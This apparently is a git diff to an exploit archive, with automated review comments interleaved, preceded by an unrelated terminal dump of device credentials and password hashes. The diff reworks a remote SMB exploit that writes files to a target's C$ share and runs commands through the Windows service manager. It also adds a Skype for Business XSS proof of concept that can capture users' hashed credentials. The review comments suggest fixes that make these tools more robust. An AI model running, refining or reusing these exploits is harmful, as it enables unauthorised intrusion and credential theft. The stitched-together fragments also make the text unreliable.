udhcpd.conf +bash-4.4$ cat web_user +admin:admin123:2 +user:user:1 +bash-4.4$ cat ./.config/ds_user_pw +admin +bash-4.4$ cat passwd +admin:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:admin:/etc:/bin/sh +root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:root:/etc:/bin/sh diff --git a/platforms/windows/remote/42315.py b/platforms/windows/remote/42315.py index efda10714..79f3ae175 100755 --- a/platforms/windows/remote/42315.py +++ b/platforms/windows/remote/42315.py @@ -458,7 +458,7 @@ def exploit(target, pipe_name): return True def smb_pwn(conn): - smbConn = smbconnection.SMBConnection(conn.get_remote_host(), conn.get_remote_host(), existingConnection=conn, manualNegotiate=True) + smbConn = conn.get_smbconnection() print('creating file c:\\pwned.txt on the target') tid2 = smbConn.connectTree('C$') @@ -466,10 +466,15 @@ def smb_pwn(conn): smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2) - #service_exec(smbConn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') + #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + +def smb_send_file(smbConn, localSrc, remoteDrive, remotePath): + with open(localSrc, 'rb') as fp: + smbConn.putFile(remoteDrive + '$', remotePath, fp.read) # based on impacket/examples/serviceinstall.py -def service_exec(smbConn, cmd): +def service_exec(conn, cmd): import random import string from impacket.dcerpc.v5 import transport, srvs, scmr 
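Review bot: The function-local import closing the `@@ -466,10 +466,15 @@` hunk, `from impacket.dcerpc.v5 import transport, srvs, scmr`, still names `transport` although its only use inside `service_exec`, the removed `transport.SMBTransport(...)` line, is gone now that `conn.get_dce_rpc('svcctl')` builds the transport; the line can shrink to `from impacket.dcerpc.v5 import srvs, scmr` (whether `srvs` is still referenced further down is outside the hunk). The new `smb_send_file` also lands without a docstring; a one-liner such as `"""Copy the local file localSrc to remotePath on the remoteDrive$ share over the existing SMB connection."""` would document its three parameters, and a short comment that `fp.read` is deliberately passed uncalled as the read callback of `putFile` would stop it from reading like a typo. The body of `service_exec` continues past the end of this hunk.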
@@ -477,13 +482,12 @@ def service_exec(smbConn, cmd): service_name = ''.join([random.choice(string.letters) for i in range(4)]) # Setup up a DCE SMBTransport with the connection already in place - rpctransport = transport.SMBTransport(smbConn.getRemoteHost(), smbConn.getRemoteHost(), filename=r'\svcctl', smb_connection=smbConn) - rpcsvc = rpctransport.get_dce_rpc() + rpcsvc = conn.get_dce_rpc('svcctl') rpcsvc.connect() rpcsvc.bind(scmr.MSRPC_UUID_SCMR) svnHandle = None try: - print("Opening SVCManager on %s....." % smbConn.getRemoteHost()) + print("Opening SVCManager on %s....." % conn.get_remote_host()) resp = scmr.hROpenSCManagerW(rpcsvc) svcHandle = resp['lpScHandle'] @@ -518,7 +522,7 @@ def service_exec(smbConn, cmd): scmr.hRDeleteService(rpcsvc, serviceHandle) scmr.hRCloseServiceHandle(rpcsvc, serviceHandle) except Exception, e: - print("ServiceExec Error on: %s" % smbConn.getRemoteHost()) + print("ServiceExec Error on: %s" % conn.get_remote_host()) print(str(e)) finally: if svcHandle: diff --git a/platforms/windows/remote/42316.ps1 b/platforms/windows/remote/42316.ps1 new file mode 100755 index 000000000..30460e75c --- /dev/null +++ b/platforms/windows/remote/42316.ps1 
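Review bot: In the `@@ -477,13 +482,12 @@` hunk the reset just above the `try:` is spelled `svnHandle = None`, while the name assigned from `hROpenSCManagerW` and tested in the `finally:` of the `@@ -518,7 +522,7 @@` hunk is `svcHandle`; if `hROpenSCManagerW` raises, the except branch prints `ServiceExec Error on:` and the `finally` then dies with an UnboundLocalError on `if svcHandle:`, hiding the real failure. Changing that line to `svcHandle = None` fixes it. The new `rpcsvc = conn.get_dce_rpc('svcctl')` plus the following `connect()` and `bind()` also sit before the `try`, so a failure there bypasses the error reporting that the rest of the function gets; moving those three lines inside the `try` would make the handling uniform. Both hunks cut through the middle of `service_exec`.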
@@ -0,0 +1,101 @@ +# Exploit Title: Skype for Business 2016 XSS Injection - CVE-2017-8550 +# +# Exploit Author: @nyxgeek - TrustedSec +# Date: 2017-04-10 +# Vendor Homepage: www.microsoft.com +# Versions: 16.0.7830.1018 32-bit & 16.0.7927.1020 64-bit or lower +# +# +# Requirements: Originating machine needs Lync 2013 SDK installed as well as a user logged +# into the Skype for Business client locally +# +# +# Description: +# +# XSS injection is possible via the Lync 2013 SDK and PowerShell. No user-interaction is +# required for the XSS to execute on the target machine. It will run regardless of whether +# or not they accept the message. The target only needs to be online. +# +# Additionally, by forcing a browse to a UNC path via the file URI it is possible to +# capture hashed user credentials for the current user. +# Example: +# +# +# +# Shoutout to @kfosaaen for providing the base PowerShell code that I recycled +# +# +# Timeline of Disclosure +# ---------------------- +# 4/24/2017 Submitted to Microsoft +# 5/09/2017 Received confirmation that they were able to reproduce +# 6/14/2017 Fixed by Microsoft + + + + +#target user +$target = "username@domain.com" + +# For this example we will force the user to navigate to a page of our choosing (autopwn?) +# Skype uses the default browser for this. 
+ +$message = "PoC Skype for Business 2016 XSS Injection" + + + + +if (-not (Get-Module -Name Microsoft.Lync.Model)) +{ + try + { + # you may need to change the location of this DLL + Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop + } + catch + { + Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824" + } +} + + # Connect to the local Skype process + try + { + $client = [Microsoft.Lync.Model.LyncClient]::GetClient() + } + catch + { + Write-Host "`nMust be signed-in to Skype" + break + } + + #Start Conversation + $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]" + + #Add the Message + $msg.Add(1,$message) + + # Add the contact URI + try + { + $contact = $client.ContactManager.GetContactByUri($target) + } + catch + { + Write-Host "`nFailed to lookup Contact"$target + break + } + + + # Create a conversation + $convo = $client.ConversationManager.AddConversation() + $convo.AddParticipant($contact) | Out-Null + + # Set the message mode as IM + $imModality = $convo.Modalities[1] + # Send the message + $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null + # End the Convo to suppress the UI + $convo.End() | Out-Null + + Write-Host "Sent the following message to "$target":`n"$message \ No newline at end of file
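Review bot: The `catch` around `Import-Module "...Microsoft.Lync.Model.dll"` only emits `Write-Warning` and lets the script continue, so when the SDK is absent the next statement, `[Microsoft.Lync.Model.LyncClient]::GetClient()`, fails with a type-not-found error that its own `catch` then mislabels as `Must be signed-in to Skype`; the import failure should stop the script, e.g. `Write-Warning "..."; exit 1`. The two `break` statements inside `try`/`catch` at script scope are not in a loop, where `break` just unwinds the calling scope with no exit code, so `exit 1` is the clearer choice there too. `$msg.Add(1,$message)` and `$convo.Modalities[1]` use bare magic numbers; a comment naming what index 1 selects in each case (content type and modality respectively) would help a reader, since neither is obvious from the surrounding code.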